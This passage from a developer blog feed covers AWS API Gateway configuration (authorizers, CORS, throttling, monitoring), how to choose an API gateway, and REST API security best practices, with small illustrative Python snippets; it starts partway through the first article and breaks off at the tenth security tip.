&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5xnhuh9cewn6oyqmq29r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5xnhuh9cewn6oyqmq29r.png" alt="Successful GET /posts response"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F9xk2vze9e5mu3t4kflfk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F9xk2vze9e5mu3t4kflfk.png" alt="Failed POST /posts response"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This section provides several options for authorizing requests. You can use the built-in IAM authorizer, or you can create and attach a new authorizer. Authorizers can be one of two types: JWT authorizers or Lambda authorizers. A JWT authorizer is used in conjunction with OpenID Connect or OAuth 2.0, while a Lambda authorizer allows you to create custom authorization functions. For more details on each type of authorizer check out the &lt;a href="https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-access-control.html" rel="noopener noreferrer"&gt;access control section&lt;/a&gt; of the API Gateway documentation.&lt;/p&gt;
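&lt;p&gt;As a rough illustration of the Lambda authorizer option, here's a sketch using the HTTP API's simple response format. The token check is a placeholder: a real authorizer would validate a JWT signature or query an identity store rather than compare against a hard-coded set.&lt;/p&gt;

```python
# Placeholder token store; a real authorizer would verify a JWT
# or call out to an identity provider instead.
VALID_TOKENS = {"example-secret-token"}

def authorizer_handler(event, context):
    # HTTP APIs lowercase incoming header names.
    token = event.get("headers", {}).get("authorization", "")
    if token.startswith("Bearer "):
        token = token[len("Bearer "):]
    # Simple response format: just report allowed / denied, plus
    # optional context that gets passed through to the backend.
    return {
        "isAuthorized": token in VALID_TOKENS,
        "context": {"tokenChecked": True},
    }
```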

&lt;h3&gt;
  
  
  CORS Configuration
&lt;/h3&gt;

&lt;p&gt;Another important feature in API Gateway is the ability to easily configure Cross-Origin Resource Sharing (CORS) settings. CORS is a browser security mechanism that restricts web pages from requesting resources from a domain other than the one that served them. If your API is on a different domain than the clients accessing it, you'll need to enable CORS. In API Gateway, this is as easy as filling in the fields under the CORS section with your desired settings.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5cm8eo4mxwbds8i7payp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5cm8eo4mxwbds8i7payp.png" alt="CORS Configuration"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If your API is only used by your own applications, you can list those origins in the Access-Control-Allow-Origin field. If your API is public, you'll need to use the wildcard (*) in this field. For details on each of the fields in this section, take a look at the &lt;a href="https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-cors.html" rel="noopener noreferrer"&gt;CORS section&lt;/a&gt; of the docs.&lt;/p&gt;
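&lt;p&gt;Under the hood, those console fields map onto standard CORS response headers. Here's a sketch of that mapping with example settings; the allowed origin and header lists are placeholders you'd replace with your own.&lt;/p&gt;

```python
# Example CORS policy: only this origin may make cross-origin calls.
ALLOWED_ORIGINS = {"https://app.example.com"}

def cors_headers(request_origin):
    """Return the CORS headers a gateway would attach for this origin."""
    if request_origin not in ALLOWED_ORIGINS:
        # No CORS headers at all: the browser blocks the response.
        return {}
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Methods": "GET,POST,OPTIONS",
        "Access-Control-Allow-Headers": "Content-Type,Authorization",
        "Access-Control-Max-Age": "3600",  # cache preflight for an hour
    }
```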

&lt;h3&gt;
  
  
  Throttling
&lt;/h3&gt;

&lt;p&gt;API Gateway allows you to add throttling to your API to prevent things like DDoS attacks or abuse of your resources. There is a built-in 10,000 requests/second limit per region, but you also have the option to add throttling within your API configuration.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Faujrw1dj01d6xkypxgaz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Faujrw1dj01d6xkypxgaz.png" alt="Throttling Configuration"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;From the API Gateway UI, you can configure throttling for your entire API on a per-stage basis. You can also configure throttling per route, though currently you'll need to do that through the API or an SDK.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fmqwwox162j7t15lmghip.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fmqwwox162j7t15lmghip.png" alt="Throttling Edit View"&gt;&lt;/a&gt;&lt;/p&gt;
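&lt;p&gt;API Gateway's throttling settings follow a token-bucket model: the burst limit is the bucket's capacity and the rate limit is how fast it refills. Here's a toy version of that logic, driven by explicit elapsed times so the behavior is easy to follow; it's a sketch of the concept, not the service's actual implementation.&lt;/p&gt;

```python
class TokenBucket:
    """Token bucket: 'rate' tokens per second refill, 'burst' capacity."""

    def __init__(self, rate, burst):
        self.rate = rate
        self.capacity = burst
        self.tokens = float(burst)

    def allow(self, elapsed):
        """Decide whether a request arriving 'elapsed' seconds after the
        previous one is let through (True) or throttled (False)."""
        # Refill for the time that passed, capped at the burst size.
        self.tokens = min(self.capacity, self.tokens + elapsed * self.rate)
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False
```

&lt;p&gt;With a rate of 1 request/second and a burst of 2, two back-to-back requests succeed, a third is throttled, and waiting a second frees up capacity again.&lt;/p&gt;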

&lt;h3&gt;
  
  
  Monitoring
&lt;/h3&gt;

&lt;p&gt;The final feature we'll look at is monitoring, which includes the Metrics and Logging sections. Both contain toggles for enabling or disabling the corresponding features in CloudWatch.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fxdcr5hjjpp2q8xsa8an7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fxdcr5hjjpp2q8xsa8an7.png" alt="Metrics Configuration"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fab7l12g2cl1bd3ypcyds.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fab7l12g2cl1bd3ypcyds.png" alt="Logging Configuration"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Metrics records the activity on your API and lets you create charts and graphs to help visualize patterns. You can also set up alarms in CloudWatch to notify someone when a metric crosses a threshold. For example, if your API returns more than ten 5xx errors in a 5-minute period, an alarm could trigger an email to your DevOps team.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fpddrd8zeadnd5ki9bk36.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fpddrd8zeadnd5ki9bk36.png" alt="CloudWatch Metrics"&gt;&lt;/a&gt;&lt;/p&gt;
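&lt;p&gt;The alarm described above is just a threshold evaluated over a trailing metric window. Here's a toy version of that check to make the rule concrete; the real evaluation happens inside CloudWatch, and the function below is only an illustration.&lt;/p&gt;

```python
def alarm_fires(error_timestamps, now, window_seconds=300, threshold=10):
    """True if more than 'threshold' errors fall within the trailing
    'window_seconds' (e.g. more than ten 5xx errors in 5 minutes)."""
    recent = [t for t in error_timestamps if now - t <= window_seconds]
    return len(recent) > threshold
```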

&lt;p&gt;Enabling logging will write an entry to your specified log group for every request your API receives.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fiqkoyfcdbr95t9mjrgm2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fiqkoyfcdbr95t9mjrgm2.png" alt="CloudWatch Logging"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And that's it! We now have a functioning API Gateway with multiple routes, pointing to multiple backend resources. We've enabled authentication on select routes, set up our CORS configuration, and turned on throttling to help protect our resources. And we've enabled monitoring and logging, so we can keep an eye on the health of our API. &lt;/p&gt;

&lt;p&gt;As you can see, API Gateway is easy to set up, integrates easily with other AWS services, and is a fully managed service, so there's no hardware to maintain or software to keep up to date. It's a great option if your organization is already using AWS services, or if you need a fully-featured gateway that can be up and running quickly with no hardware setup or maintenance.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>cloud</category>
      <category>microservices</category>
    </item>
    <item>
      <title>What's an API Gateway and How Do You Choose the Right One</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Mon, 30 Nov 2020 02:46:39 +0000</pubDate>
      <link>https://forem.com/leading-edje/what-s-an-api-gateway-and-how-do-you-choose-the-right-one-12pk</link>
      <guid>https://forem.com/leading-edje/what-s-an-api-gateway-and-how-do-you-choose-the-right-one-12pk</guid>
      <description>&lt;p&gt;An API Gateway is an essential, and often misunderstood, piece of an organization's API architecture. The massive number of clients that need access to data, from mobile apps to single page applications to IoT devices, have caused an explosion in the number of organizations relying on APIs. There are various types of gateways available, and numerous features provided by each. There's no one-size-fits-all solution, and the correct choice depends on each organization's unique needs.&lt;/p&gt;

&lt;h1&gt;
  
  
  What is an API Gateway?
&lt;/h1&gt;

&lt;p&gt;An API Gateway provides a single point of access to your backend services. Similar to a reverse proxy, it receives all incoming traffic and directs it to the proper service. This provides a layer of abstraction over your backend services, allowing clients to contact a single interface, rather than querying each service individually. But unlike a simple proxy, it can provide a variety of other features to help improve the security, efficiency and monitoring of the API. The image below shows some of the features available in the popular, open-source project, &lt;a href="https://konghq.com/kong/" rel="noopener noreferrer"&gt;Kong Gateway&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fc6zzia4cwhq7gb37kxpt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fc6zzia4cwhq7gb37kxpt.png" alt="Kong Gateway Features"&gt;&lt;/a&gt;&lt;/p&gt;
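&lt;p&gt;The routing role of a gateway can be pictured as a small table mapping path prefixes to upstream services. This is only a sketch of the idea; the service URLs below are placeholders, and a real gateway adds authentication, transformation, and the other features discussed here on top of this dispatch step.&lt;/p&gt;

```python
# Hypothetical routing table: path prefix -> backend service.
ROUTES = {
    "/users": "http://users-service.internal",
    "/posts": "http://posts-service.internal",
}

def resolve_backend(path):
    """Return the upstream URL a request should be forwarded to,
    or None if no route matches (the gateway would return a 404)."""
    for prefix, upstream in ROUTES.items():
        if path.startswith(prefix):
            return upstream + path
    return None
```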

&lt;h3&gt;
  
  
  Authentication
&lt;/h3&gt;

&lt;p&gt;One of the most important features of a gateway is how it handles authentication. By authenticating all incoming requests in the gateway, you eliminate the need to perform authentication in each individual service. This can significantly improve your API's performance, and it reduces the available attack surface.&lt;/p&gt;

&lt;p&gt;The authentication methods that a gateway supports are an important factor to consider when evaluating your options. What type of authentication do you want to use? Some will support a wide range of methods (basic authentication, API keys, OAuth, LDAP, etc.), while others may be more limited. Do you need to allow anonymous requests? Do you need to support multiple authentication methods to a specific service?&lt;/p&gt;

&lt;h3&gt;
  
  
  Authorization
&lt;/h3&gt;

&lt;p&gt;Once a request is authenticated, the gateway may restrict which services the request has access to. This is generally done through policies set up in the gateway's configuration. For example, your API may have some services that are available to partner organizations, while others are restricted to internal use only.&lt;/p&gt;

&lt;p&gt;To understand the type of authorization support you need, consider if your API needs to support different levels of access for different users. Do you offer subscription plans where higher tiers have access to additional services? Are your services configured in a way that allows you to handle authorization in the gateway, or does that logic need to be handled at the service layer?&lt;/p&gt;

&lt;h3&gt;
  
  
  Traffic Control
&lt;/h3&gt;

&lt;p&gt;Another major feature of API gateways is the ability to manage the traffic accessing your services. You may want to limit the number of requests by IP address, or for a particular API key, for example. You may also want to limit the size or type of requests that your system will accept. Traffic control can help stop DDoS attacks, prevent abuse of your API, relieve stress on services with fewer resources, and help prioritize system responses.&lt;/p&gt;

&lt;p&gt;When evaluating your gateway options, consider your organization's needs for regulating traffic. How much traffic can your backend services handle? Are some services more susceptible to overload than others? If you offer different access tiers for your API, do you need to allow higher rate limits for your higher tiered customers? Do you have specific applications or customers who should receive priority during heavy load times?&lt;/p&gt;

&lt;h3&gt;
  
  
  Logging and Analytics
&lt;/h3&gt;

&lt;p&gt;Gateways can also allow you to consolidate common functionality like logging and analytics. This can reduce duplication across services. Most can also be integrated with third-party solutions to provide complete monitoring for your systems.&lt;/p&gt;

&lt;p&gt;You'll need to consider what type of monitoring and logging your organization needs. What security or analytics tools do you need to integrate? Do you need to correlate gateway logs with service logs?&lt;/p&gt;

&lt;h3&gt;
  
  
  Payload Transformations
&lt;/h3&gt;

&lt;p&gt;The ability to transform payloads is another common feature for gateways to support. This allows organizations to support services that use mixed protocols, while providing a consistent interface to their API. Additionally, legacy services can be exposed with minimal effort, even if they use different response types.&lt;/p&gt;

&lt;p&gt;Think about the services your organization currently has in place. Do the responses need to be modified to match your API's responses? Do you need to support multiple protocols?&lt;/p&gt;

&lt;h1&gt;
  
  
  Comparing Gateway Options
&lt;/h1&gt;

&lt;p&gt;Beyond the feature questions above, there are several other points that need to be considered when selecting a gateway solution.&lt;/p&gt;

&lt;h3&gt;
  
  
  Self-Hosted vs. SaaS
&lt;/h3&gt;

&lt;p&gt;While different gateways may vary drastically in the features they support, they can all be divided into two basic categories: Self-Hosted or SaaS. There are numerous self-hosted gateway options available, and the features they support can vary widely. This type of gateway can be deployed either on-premises or to a cloud platform. If you're hosting your gateway yourself, you have much more control, but you also have the responsibility for ensuring that your systems are configured correctly, and for keeping the software up-to-date.&lt;/p&gt;

&lt;p&gt;SaaS gateways, on the other hand, are offered by all of the major cloud platforms. While they may differ slightly, they're all fairly similar in the features they offer. This type of gateway shifts some of the management responsibility off of your organization, like keeping the software updated. However, you will still need to ensure that your gateway is configured correctly to protect your backend services. One of the primary benefits of this type of gateway is its ease of integration with the cloud provider's other services.&lt;/p&gt;

&lt;p&gt;Your choice of gateway type will depend on the features your organization needs, and on how your backend services are deployed. If you're already using a cloud platform for hosting your services, it may make sense to use the platform's gateway, since it can easily integrate with your other services, such as authorization, logging and monitoring. On the other hand, cloud gateways may not provide some features, such as payload transformation and their traffic control functionality may be more limited. Additionally, it may be more difficult to integrate with third-party services that you use. If your services are mostly on-premises, or you're using other third-party tools for monitoring or logging, it may make more sense to use a self-hosted option. Additionally, self-hosted solutions may offer the ability to create your own plugins if you need very specific custom functionality.&lt;/p&gt;

&lt;h3&gt;
  
  
  Deployment Complexity
&lt;/h3&gt;

&lt;p&gt;Another factor to consider is how easily the gateway can be deployed. How complex is the initial configuration? What other resources are required by the gateway software? How difficult is it to redeploy the gateway when changes are made? Can deployments be automated?&lt;/p&gt;

&lt;p&gt;In general, cloud gateways are going to require less initial setup. They will generally provide a developer UI, as well as an API, and can usually be easily integrated with the platform's automated deployment tools, such as CloudFormation or Google Cloud Deployment Manager. With a self-hosted solution, you will need to handle configuration and deployment on your own.&lt;/p&gt;

&lt;p&gt;Different self-hosted solutions will also require different resources to be deployed, configured and maintained. For example, Apigee requires Cassandra, Zookeeper, and Postgres to run, while other solutions like Express Gateway and Tyk.io only require Redis. This won't be an issue if you choose to go with a cloud gateway, because they abstract the additional resource requirements, so you can just focus on the API itself.&lt;/p&gt;

&lt;h3&gt;
  
  
  Open Source vs. Proprietary
&lt;/h3&gt;

&lt;p&gt;You'll also need to decide if you want to use an open source solution or a proprietary gateway. Do you foresee the need to make changes to the gateway's source code? What level of support do you need? Does the solution allow you to build custom plugins if needed? Are you already using other products from a vendor that offers an API gateway solution? There are both proprietary and open source options for self-hosted solutions; however, all cloud gateways fall into the proprietary category.&lt;/p&gt;

&lt;p&gt;Obviously, if you go with a proprietary solution, you won't have access to the source code, and won't be able to customize the software if it doesn't meet your needs. However, some may allow you to create plugins to provide some custom functionality if you need it. Open source solutions, on the other hand, allow you to have complete control over your gateway. If it doesn't include all of the features you need, you can add them. One thing to remember, though, is that if you fork and customize an open source project, you take on the responsibility of keeping your version up to date with future upstream changes. If the custom functionality is something others might find useful, this can be resolved by contributing your changes back to the project. Another risk with open source solutions is that the project may be abandoned. When evaluating your options, make sure to determine whether a project is under active development and has enough community involvement to keep it going.&lt;/p&gt;

&lt;p&gt;Usually, you'll have far more technical support if you go with a proprietary solution. When you're paying for a product, the company has a vested interest in ensuring that you're happy and can use the product successfully. The only support you can expect for open source solutions is from the community. This is another reason to make sure that a project has strong community support. That being said, a lot of open source projects are backed by larger companies that offer support packages, for a price.&lt;/p&gt;

&lt;h3&gt;
  
  
  Price
&lt;/h3&gt;

&lt;p&gt;Finally, you'll need to consider the price for each solution. Most self-hosted proprietary vendors are not transparent about their pricing, so you'll need to contact their sales team to get accurate pricing for comparison. Cloud gateways, however, do provide pricing details. They generally run on a per-call pricing model, with additional charges for the amount of data transferred. In order to figure out which solution is more cost-effective, you'll need an estimate of the amount of traffic you expect your API to receive, and the average response size. While a cloud solution may be less expensive for low-volume APIs, if you are expecting a lot of traffic, there will be a tipping point where it becomes more expensive to pay per-call than to license and host a solution yourself.&lt;/p&gt;
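&lt;p&gt;That tipping point is straightforward to estimate once you have quotes in hand. Here's a sketch of the comparison; every figure below is a made-up placeholder, so plug in your actual per-call price, data-transfer rate, and self-hosted licensing and hosting costs.&lt;/p&gt;

```python
def monthly_cloud_cost(requests, price_per_million=1.00, gb_out=0.0, price_per_gb=0.09):
    """Estimated monthly bill under per-call pricing (placeholder rates)."""
    return requests / 1_000_000 * price_per_million + gb_out * price_per_gb

def cheaper_option(requests, self_hosted_monthly=2_000.00):
    """Compare the per-call estimate against a flat self-hosted cost."""
    cloud = monthly_cloud_cost(requests)
    return "cloud" if cloud < self_hosted_monthly else "self-hosted"
```

&lt;p&gt;Under these example rates, a low-volume API is cheaper in the cloud, while billions of requests per month tip the balance toward self-hosting.&lt;/p&gt;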

&lt;h1&gt;
  
  
  Available Options
&lt;/h1&gt;

&lt;p&gt;With all of these factors in mind, here are a few popular options of each type to get you started in your research:&lt;/p&gt;

&lt;h3&gt;
  
  
  Cloud platform gateways
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://aws.amazon.com/api-gateway/" rel="noopener noreferrer"&gt;AWS API Gateway&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/api-gateway" rel="noopener noreferrer"&gt;Google Cloud API Gateway&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://azure.microsoft.com/en-us/services/api-management/" rel="noopener noreferrer"&gt;Azure API Management&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.ibm.com/cloud/api-connect" rel="noopener noreferrer"&gt;IBM API Connect&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Proprietary, self-hosted solutions
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.mulesoft.com/" rel="noopener noreferrer"&gt;Mulesoft&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.axway.com/en/products/api-management/gateway" rel="noopener noreferrer"&gt;Axway&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/apigee/" rel="noopener noreferrer"&gt;Apigee&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Open source, self-hosted solutions
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://konghq.com/kong/" rel="noopener noreferrer"&gt;Kong&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://tyk.io/" rel="noopener noreferrer"&gt;Tyk.io&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.express-gateway.io/" rel="noopener noreferrer"&gt;Express Gateway&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.krakend.io/" rel="noopener noreferrer"&gt;KrakenD&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;While this certainly isn't an exhaustive list of all available options, these are some of the most popular API gateways. The best choice will depend greatly on your organization's needs. Hopefully, the factors above will help guide you as you evaluate your options.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>microservices</category>
    </item>
    <item>
      <title>Best Practices for Securing Your REST APIs</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 16 Sep 2020 03:47:19 +0000</pubDate>
      <link>https://forem.com/leading-edje/best-practices-for-securing-your-rest-apis-563c</link>
      <guid>https://forem.com/leading-edje/best-practices-for-securing-your-rest-apis-563c</guid>
      <description>&lt;p&gt;APIs are the backbone of the modern data-driven economy. Whether you're moving your infrastructure to the cloud, shifting to a microservice based architecture, or just trying to integrate new services with your existing monolithic systems, chances are your business is relying on APIs to transfer your data. With the speed of business, it's easy for security to become an afterthought.&lt;/p&gt;

&lt;p&gt;With your customers and partners relying on you to keep their data safe, it's important to make security a top priority when designing your APIs. With that in mind, here are ten tips for ensuring that your APIs are secure. While these tips are specifically aimed at REST APIs, many of them are also applicable to other types, such as GraphQL APIs.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Always use transport layer security
&lt;/h3&gt;

&lt;p&gt;Your APIs should only expose HTTPS endpoints. This protects credentials used to authenticate with your systems from being intercepted in transit, and helps to guarantee the integrity of the data being returned.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Use an established and trusted authentication framework
&lt;/h3&gt;

&lt;p&gt;Avoid attempting to "roll-your-own" security solution for your APIs. Use a well-established framework like Auth0, OpenID Connect, Amazon Cognito, or Firebase Authentication. These frameworks have teams of developers who have spent thousands of hours working out bugs and finding and fixing vulnerabilities.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Consider using an API Gateway service
&lt;/h3&gt;

&lt;p&gt;If your API is cloud based, consider using the cloud platform's API Gateway service. This type of service provides fine-grained control over who can access your endpoints. All of the major cloud platforms have a gateway service available, and the additional layer of protection is well worth the cost.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Whitelist permitted HTTP methods
&lt;/h3&gt;

&lt;p&gt;If your exposed endpoints only use specific methods, whitelist the methods that are allowed, and reject all others. For example, if your API is read-only, you can whitelist the GET method, and reject any POST, PUT or DELETE requests.&lt;/p&gt;
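&lt;p&gt;A method whitelist is only a few lines in any framework or gateway filter. As a sketch, for a read-only API (the allowed set here is an example policy; HEAD and OPTIONS are included since browsers and tooling commonly send them):&lt;/p&gt;

```python
# Example policy for a read-only API.
ALLOWED_METHODS = {"GET", "HEAD", "OPTIONS"}

def check_method(method):
    """Accept whitelisted methods; reject everything else with a 405
    and an Allow header listing what the endpoint supports."""
    if method.upper() in ALLOWED_METHODS:
        return {"status": 200}
    return {"status": 405, "headers": {"Allow": ", ".join(sorted(ALLOWED_METHODS))}}
```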

&lt;h3&gt;
  
  
  5. Always validate user input
&lt;/h3&gt;

&lt;p&gt;Any input sent by the user must be validated and sanitized before it reaches your application logic. Be as strict as possible with your validation. Use strong types and regular expressions to make sure the input you receive matches what your application expects and is able to handle. Consider establishing a reasonable size limit for requests, and reject any larger requests. All failed validation should be logged and monitored for unusual request behavior.&lt;/p&gt;
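&lt;p&gt;Here's a sketch of that kind of strict validation: a request size cap plus a tight regular expression for an expected field. The username rule and size limit are example policies, not universal values; adapt them to what your application actually accepts.&lt;/p&gt;

```python
import re

# Example policy: 3-32 characters of letters, digits, or underscores.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")
MAX_BODY_BYTES = 10_000  # example size cap; reject anything larger

def validate_request(body_bytes, username):
    """Return (ok, reason). Reject oversized payloads and any username
    that doesn't match the expected shape exactly."""
    if len(body_bytes) > MAX_BODY_BYTES:
        return False, "payload too large"
    if not USERNAME_RE.fullmatch(username):
        return False, "invalid username"
    return True, "ok"
```

&lt;p&gt;Failures from a validator like this are exactly what should be logged and watched for unusual request patterns.&lt;/p&gt;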

&lt;h3&gt;
  
  
  6. Apply rate limiting
&lt;/h3&gt;

&lt;p&gt;Establish reasonable limits on the number of requests you expect to receive from any single source. Any requests above this limit should be dropped. This can help prevent denial of service attacks on your systems. Depending on how your API is structured, you may wish to implement even finer controls by specifying different limits for different resources, or by adjusting the limits based on the client making the requests.&lt;/p&gt;

&lt;h3&gt;
  
  
  7. Be as specific as possible with CORS settings
&lt;/h3&gt;

&lt;p&gt;CORS stands for cross-origin resource sharing, and your settings determine how cross-domain requests are handled by browsers. If your API isn't expecting cross-origin requests, you should disable CORS. Otherwise, you should be as specific as possible with the domains that you allow cross-origin requests from. It's also important to note that CORS is strictly a client-side security feature, and should not be relied on, in any way, for server-side security.&lt;/p&gt;

&lt;h3&gt;
  
  
  8. Take advantage of your framework's built-in security features
&lt;/h3&gt;

&lt;p&gt;No matter your development language, there's a pretty good chance you're using a framework to build your API. Whether it's Django, Rails, Spring or ASP.NET Core, nearly all modern API frameworks have some built-in security features that you should be taking advantage of, such as protection against attacks like cross-site request forgery and click-jacking, session security, or header validation. That being said, it's also important not to fall into the trap of believing that your framework's default security configuration is good enough. Take the time to fully understand the features available in your framework, and make sure your configuration maintains the &lt;a href="https://en.wikipedia.org/wiki/Principle_of_least_privilege" rel="noopener noreferrer"&gt;principle of least privilege&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  9. Never store credentials in version control
&lt;/h3&gt;

&lt;p&gt;Any secrets (passwords, API keys, SSH keys, etc.) should never be checked in to your version control system. Even if your repository is private, it's still considered bad practice to keep your credentials with your source code. Instead, consider using environment variables for passing your secrets into your applications, or utilize a service specifically for storing secrets, such as &lt;a href="https://www.vaultproject.io/" rel="noopener noreferrer"&gt;Hashicorp's Vault&lt;/a&gt;. Most cloud platforms also have their own services for storing and retrieving credentials.&lt;/p&gt;

&lt;h3&gt;
  
  
  10. Return appropriate error messages
&lt;/h3&gt;

